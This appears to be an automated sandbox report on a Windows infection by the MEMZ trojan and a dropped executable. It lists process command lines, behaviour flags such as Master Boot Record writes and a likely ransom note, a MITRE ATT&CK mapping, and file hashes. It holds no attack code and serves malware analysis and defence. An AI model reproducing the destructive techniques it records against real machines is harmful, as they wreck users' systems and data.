C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2460,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:82⤵PID:2024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4520,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4544 /prefetch:82⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4520,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4544 /prefetch:82⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=120,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:82⤵PID:552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4752,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4832 /prefetch:82⤵PID:1340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --field-trial-handle=3272,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:82⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3104,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=3904,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2816 /prefetch:82⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=1600,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=3168 /prefetch:82⤵PID:1808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=1296,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2464 /prefetch:12⤵PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3908,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:12⤵PID:1268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=5420,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:82⤵PID:1228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --field-trial-handle=5428,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:82⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"1⤵PID:232
-
C:\Users\Admin\AppData\Roaming\System User"C:\Users\Admin\AppData\Roaming\System User"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1732
-
C:\Users\Admin\AppData\Roaming\System User"C:\Users\Admin\AppData\Roaming\System User"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1692
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnregisterRevoke.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3656
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:1004
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3616 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7ebd3c3-6f55-4b39-a909-1e8deea77a0f} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" gpu3⤵PID:2084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {16595b9c-3a77-4e1a-b651-77c4b8d96755} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" socket3⤵PID:3304
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2672 -childID 1 -isForBrowser -prefsHandle 3176 -prefMapHandle 2704 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecf785d6-f9e9-4d2e-9ef1-470b471b7e7c} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab3⤵PID:552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3428 -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3684 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3de32c12-9eed-4259-9b9c-b342ac13d1fe} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab3⤵PID:2876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1536 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 1556 -prefMapHandle 1268 -prefsLen 29119 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1061bcab-5a68-40b0-92e5-d740513a08c6} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" utility3⤵
- Checks processor information in registry
PID:6104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5172 -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5180 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f035963e-bc75-4c43-95a4-167739fde7ac} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab3⤵PID:5440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5160 -childID 4 -isForBrowser -prefsHandle 5188 -prefMapHandle 5124 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {262f64f5-085e-44d2-8bbf-bfde848d88e4} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab3⤵PID:5432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 5 -isForBrowser -prefsHandle 5392 -prefMapHandle 5384 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {826eab96-93ac-49d3-b24d-bd98d7b8f0a8} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab3⤵PID:5388
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2736 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa1f60cc40,0x7ffa1f60cc4c,0x7ffa1f60cc582⤵PID:4188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1944 /prefetch:22⤵PID:4440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2424 /prefetch:32⤵PID:2216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2456 /prefetch:82⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3156 /prefetch:12⤵PID:2120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:4564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4580 /prefetch:12⤵PID:5176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4940 /prefetch:82⤵PID:5524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4968 /prefetch:82⤵PID:5984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5188,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4784 /prefetch:12⤵PID:5484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5252,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5308 /prefetch:12⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5568,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5596 /prefetch:82⤵PID:5256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5560,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5616 /prefetch:82⤵PID:1292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5576,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5896 /prefetch:82⤵PID:1420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5484,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5540 /prefetch:82⤵PID:5260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5888,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5296 /prefetch:82⤵
- Drops file in System32 directory
PID:4276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:1220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa1f60cc40,0x7ffa1f60cc4c,0x7ffa1f60cc582⤵PID:1536
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5932
-
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5972 -
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5844
-
-
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5220
-
-
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5224
-
-
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5940
-
-
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4656
-
-
C:\Users\Admin\Desktop\MEMZ.exe"C:\Users\Admin\Desktop\MEMZ.exe" /main2⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:5656 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" \note.txt3⤵
- System Location Discovery: System Language Discovery
PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=dank+memz3⤵PID:5160
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38da055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:6248
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40B
MD54fd2e1e0ee89ab2efcf64b13813dfb57
SHA1f1469469ac1884f002fbe3cba1d8be88cfdf39af
SHA256b94064c9e6abef05638da45947d0760325acfec963626406aa73bdeb3f3e77a6
SHA512f28e540f5e356191f33a7e5cb091d9e6fcafac73a94e87d6b96823ff9cd8d914ed319cb3ad1ea76a5e788b7637826b6b5fa6b3a6c96f24353c0c44f9ce0b00cc
-
Filesize
649B
MD5373e22b28b4b51911f26ee3ab6ef6172
SHA1874000a8d6c02a559c02f3b88fc0e46a4b189903
SHA256e0a865791b05642fc336db2a375ffba39f596ec5277e47d866402da436a822ee
SHA5123ec8dcfd91b065943fab89a5fd507dfdeaaf45f28d77deeac51be969b8f099dec05f63741fd4b8934d4c4abe92df0995c249a63c96f419551ab4c7df422a210f
-
Filesize
211KB
MD5e7226392c938e4e604d2175eb9f43ca1
SHA12098293f39aa0bcdd62e718f9212d9062fa283ab
SHA256d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1
SHA51263a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145
-
Filesize
216B
MD5d317f6e396fba4a8ec3ba4d0e4c0bbe1
SHA187ca2372f7a5dd6434cbc865e35fc8061e11f381
SHA2561c1392f522b3b4c5b4a301db0d9a336689dad3751e7f43517be6bf54e19e893a
SHA512df38764dbdaf642021f1cc4eadeaeff30aec97573cb34360b9a5dae8b3fdb5268204007fe3298a9f4f28350a86522d7d7f97dd816ba1a9ca62cd023fb19f31db
-
Filesize
3KB
MD506e20dbfb9642b41a16bde8adb3991db
SHA1aad7362b1839a6f933c0e74f1c6627a7838d9325
SHA256ae273e10476f0c62024382338d4d21c126e9f53f622dc59ef7445707ee2c6634
SHA512e32f97777938e0fd5a3b83c30c1f756fa722f8a340b5fe391c73177540b228a6bb9d0e4b851f1ddc88a07c58adbfa2c5173f477cf4e67b9613c710d1803f023e
-
Filesize
3KB
MD5c5ce7420d31f8a342b901fdff1e9ae43
SHA1aa402549230f5a9b663d48979a506173e9811494
SHA2568b0e04e41d3ccf8f1d7d88417dfca5a54d52b57f5629efc431c6f49d2b5660e0
SHA5127827a1396683b10c71fc3abffb6dcb7f9ec262f768af64f962a9fd12eda8cfcd9364855da6d5de2aac3116943824fc463c50e1b282bf6775aec4fbf0a2f06f55
-
Filesize
4KB
MD5b5f126ddc3ded44a03829f76da7226ed
SHA1a45be4f0c37ca5310bbc3af07fc47f4da13f319c
SHA256c179d55919e14865ccb10a13f809bc59206af234d1de5453b9491d2b8ba0130f
SHA5129c81e06384285bffc420f95ba507a599c7c241a2b4e16b80f740e058e9530cf3d7eb581d10bdd7049378eeb47f87c5093033c9c1b7847f4d676b49b681bde85a
-
Filesize
1KB
MD5f709b2ccf59cc7daea3eaa9d87412aeb
SHA18a17b826ef5c888753c8fc53ecbcb85f6ad2e68c
SHA256327c9fb7a49bdf0e3bf8672b5ee3337ed7ca0454100b869480eb7d87ff5e4959
SHA512890b6da16b6bfb07d65c2c3271535736d1d54e8b837323c5b6c5a2a7ee244257d80262c178b7ff3dd77da2dc37daf79437056e7d54d0c60d3f1ea2455b7045f6
-
Filesize
356B
MD530310a28d63fb849e54eccca78929be2
SHA1ccd4a196413b3163be0dbb10b12b623513f29b54
SHA256c0638647c97cd0dd7fc0ceb08f494e22899a81007e46a78f529a3035ba765d17
SHA512caaaa4473eae3592425bf35a394ff82ba5986098801075f4942c8b7688ab406dbcbf88ced3b02a00e0566e8c552fd447f62afa95c89c115f187cce3652ff915c
-
Filesize
1KB
MD5d2c4df06cc1019053cedf1efbab0dd13
SHA135d3b8b0cae84c0c030c7f8e2613b2b51c3530b1
SHA25672c4239b216e6ce3b7afec6816906d28d5f05a73d03f0fddde52e688711d30d0
SHA512ccb344a11384617d223ad5a565abfe1d5770acd0be47e71d885f432946cc4a5ae4f7471bc15f010ace9f59958c9299bdc79a448e4086109e0655f1784c78ada2
-
Filesize
1KB
MD5bab8131f2840027b983f03209b80fde7
SHA16e2739bda0c49cc1959d8ee2fc43a63bf56faba3
SHA2569cb3abe52a1d63257bac1cfe743129bb52ec15751b04d737b4026f912f6348ea
SHA5123a7cb9575a7f19e78619244d503977f32e83cd1a29046992cf8cbb3f170d1240fadce3977156e6baeab77b08858dcc8eca2c49ef7ca29844d48c77e34b2a7cbd
-
Filesize
9KB
MD54c152f8c16f58b5a334e2c0a67cf3b71
SHA19d269a5b1820c916702031f62317f8bb74df1c78
SHA2569a8884608500e6a19e9bf882df8dc0a2b5314c32e0f6b7c4d7d6f38853105e6f
SHA512348d686d363d38154850aa0a60a11fa4935300d63baff4b41339407bb188b11a26cd61cb30dc76e86868082891cc83daa8bbc058418b31afc6f4ac3605643ffe
-
Filesize
9KB
MD5f6b3d7f68c762f3e6cf8573df21cc400
SHA14cdd19c1daebf5d71a3cb4abe15e456152748aff
SHA2560e13274b9ba654c6fb3dfac1e7af0c585985960da2e722b4fc9582370ec81b11
SHA512d8ebb29d69981cc19f27f8285d5617089fbb4bf5ba3fbfb8bb53d3040d89111cb05e5c1a326bd3d139bb506b088fbeda0577b4b3aeafce43c75073382f50c5f7
-
Filesize
9KB
MD58a0f232f48eb06ef80a88f0191d08b9b
SHA1db18a2fff8f49c018dcb1ba6c79f3ab60c567c4e
SHA256561f68bdcead33751f8a94eb781a28d725be44143b17a73c31391eb57ad4d9e0
SHA512070bd6184ccbb6aa44a03bbfa9b76d67381dd58d80fa36334ec12dc7d567111c1a5798f14e37cc59a85f053d228f8091c067dd3c4bdaebc872be1738ca32204d
-
Filesize
10KB
MD561f7bf746f287539e3393029e582adb5
SHA1645d1a628b91288031afd900fec786680e895343
SHA2562873715b217642c5d8739882f5fb996bf3c82b3eb3df84d320a01fdbcd8c5cd8
SHA51239209539a90760c7d09fe5ff533048d03f85409a0bdf7033750dcbb6ec15a81f0b6989e648ae8ae4a9be03e06719567a972896062cb66f6b9a589638fd0185cd
-
Filesize
10KB
MD5926061876f98cb5ad9f9cc2de362e32b
SHA1460f17ec12a8db1e134c8ed1d9cca7770202ea45
SHA256636184cb7375377f7d08d241e1ad1cebaa199bdadc6a85e79ca3f43232354038
SHA5127b8add686d12923b707e24052e4e2d7c13e1c74c403408fc48b819fcff55f2632cbf6a58433fe7d119b9012294966e3660bfadac58fce4d79238cb2ad93f69ba
-
Filesize
10KB
MD5f5dc6c7448414ceb621d352cf56f9c68
SHA101d2d6d5ba8c5009175b9e3adc7d7143b9348025
